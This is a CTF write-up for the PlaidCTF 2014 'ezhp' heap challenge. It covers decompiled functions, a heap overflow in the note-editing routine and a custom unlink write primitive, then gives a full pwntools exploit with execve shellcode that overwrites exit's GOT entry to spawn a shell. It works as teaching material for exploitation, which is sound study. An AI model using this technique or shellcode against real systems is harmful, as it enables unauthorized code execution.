[Plaid 2014] pwnable : ezhp

ezhp

This challenge is my first exp to exploit heap overflow bug. So more time is needed than other cases.

Anyway, Given file is x86 stripped elf file.

zero@ubuntu:~/Desktop/ctf/plaid2014$ file ezhp
ezhp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, stripped
 

Applied memory protections are..

zero@ubuntu:~/Desktop/ctf/plaid2014$ gdb -q ./ezhp
Reading symbols from ./ezhp...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

None of MPs except partial RELRO! Canary and NX is disable. But maybe there is ASLR enable on server env.

zero@ubuntu:~/Desktop/ctf/plaid2014$ ./ezhp
Please enter one of the following:
1 to add a note.
2 to remove a note.
3 to change a note.
4 to print a note.
5 to quit.
Please choose an option.

maybe this challenge is just simple overflow prob whether stack or heap.

let's start with 'add_note' disassembly code!

int add_note()
{
  int result; // eax@2
  intptr_t delta; // [sp+18h] [bp-10h]@3
 
  if ( limit <= 1022 )
  {
    puts("Please give me a size.");
    fflush(stdout);
    __isoc99_scanf("%d%*c", &delta);
    *&buf[4 * limit] = cus_malloc(delta);
    result = limit++ + 1;
  }
  else
  {
    puts("The emperor says there are too many notes!");
    result = fflush(stdout);
  }
  return result;
}

add_note function, Firstly scan the buffer size and save result of cus_malloc in buf[4*limit]. ( buf[] size is 4096 bytes )

And we can add a note maximum 1022 times.

In cus_malloc,

deltaa = delta + 12 - (delta + 12) % 12u + 12;// size - size % 12 + 24
...
    if ( deltaa < 1036 )
      deltaa = 1036;
    v4 = sbrk(deltaa);

Minimum size is 1036 bytes and it allocates with sbrk() ( similar with malloc(), actually malloc() also use brk() internally )

sbrk() works as expending data segment's area ( expending end of segment )

% For example sbrk(0x1000) will exactly allocate 0x1000 unlike malloc() ( malloc() allocates more memory to prevent calling brk() again later.

% If u wanna know about the lowest address of segments, then u just use sbrk(0) and it'll return the address.

Next is 'change note' function.

ssize_t change_note() {
  ssize_t result; // eax@1
  int id; // [sp+18h] [bp-10h]@1
  size_t nbytes; // [sp+1Ch] [bp-Ch]@4
 
  puts("Please give me an id.");
  fflush(stdout);
  __isoc99_scanf("%d%*c", &id);
  result = limit;
  if ( id <= limit )  {
    result = id;
    if ( id >= 0 )    {
      result = *&buf[4 * id];
      if ( result )      {
        puts("Please give me a size.");
        fflush(stdout);
        __isoc99_scanf("%d%*c", &nbytes);
        puts("Please input your data.");
        fflush(stdout);
        result = read(0, *&buf[4 * id], nbytes);
      }
    }
  }
  return result;
}

There are codes which have heap overflow because read() is used without any bound checking.

In remove_note func...

int __cdecl cus_free(int ptr) {
  int result; // eax@8
  int v2; // [sp+4h] [bp-Ch]@2
  int v3; // [sp+8h] [bp-8h]@2
  int v4; // [sp+Ch] [bp-4h]@2
 
  if ( ptr )
  {
    v2 = ptr - 12;
    v3 = *(ptr - 12 + 8);
    v4 = *(ptr - 12 + 4);
    if ( v3 )
      *(v3 + 4) = v4;
    if ( v4 )
      *(v4 + 8) = v3;
    *(v2 + 4) = *(sbrk_ptr + 4);
    if ( *(sbrk_ptr + 4) )
      *(*(sbrk_ptr + 4) + 8) = v2;
    *(sbrk_ptr + 4) = v2;
    result = ptr - 12;
    *v2 &= 0xFFFFFFFE;
  }
  return result;
}
 
// let's change to understandable codes,,,
 
typedef struct _heap {
    struct heap *prev;
    struct heap *next;
    size_t size;
} heap;
 
void __cdecl cus_free(void *ptr) {
  if ( ptr )  {
    heap *tmp = ptr - 12; // current heap address 
    heap *prev = tmp->prev;
    heap *next = tmp->next;
    /* unlink() */
    if ( prev ) prev->next = next;
    if ( next ) next->prev = prev;
    /* store it in 'free list' ( sbrk_ptr ) */ 
    tmpr->next = sbrk_ptr->next;
    if ( sbrk_ptr->next )
      sbrk_ptr->next->prev = tmp;
    sbrk_ptr->next = tmp;
    tmp->size &= 0xFFFFFFFE;
  }
}
 

custom unlink() writes prev(v3) at next+8 and next(v4) at prev+4.

Final Exploit Code :

from pwn import *
 
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
 
def add_note(size):
    p.recvuntil("Please choose an option.\n")
    p.sendline("1")
    p.recvuntil("Please give me a size.\n")
    p.sendline(str(size))
 
def remove_note(id):
    p.recvuntil("Please choose an option.\n")
    p.sendline("2")
    p.recvuntil("Please give me an id.\n")
    p.sendline(str(id))
 
def change_note(id, size, payload):
    p.sendline("3")
    p.recvuntil("Please give me an id.\n")
    p.sendline(str(id))
    p.recvuntil("Please give me a size.\n")
    p.sendline(str(size))
    p.recvuntil("Please input your data.\n")
    p.sendline(str(payload))
 
def print_note(id):
    p.recvuntil("Please choose an option.\n")
    p.sendline("4")
    p.recvuntil("Please give me an id.\n")
    p.sendline(str(id))
 
size = 128
exit_got = 0x0804a010
 
p = process("./ezhp")
 
# Stage 1 - add 3 notes
add_note(1)
add_note(size - 20)
add_note(1)
 
# Stage 2 - Overwrite GOT
p.recvuntil("Please choose an option.\n")
change_note(1, size, "A"*(size - 4) + p32(exit_got - 8))
 
# Stage 3 - custom unlink()
remove_note(2)
 
# Stage 4 - Write shellcode
change_note(0, size + 12, "A"*(size + 12 - len(sc)) + sc)
 
# Stage 6 - Exit 
p.sendline("5")
 
# Get Shell!
p.interactive()

Test Environment is Ubuntu 16.04 x86-64. ( Wherever it doesn't matter )

Get Shell!

zero@ubuntu:~/Desktop/ctf/plaid2014$ python ezhp.py
[+] Started program './ezhp'
[*] Switching to interactive mode
Please enter one of the following:
1 to add a note.
2 to remove a note.
3 to change a note.
4 to print a note.
5 to quit.
Please choose an option.
$ id
uid=1000(zero) gid=1000(zero) groups=1000(zero)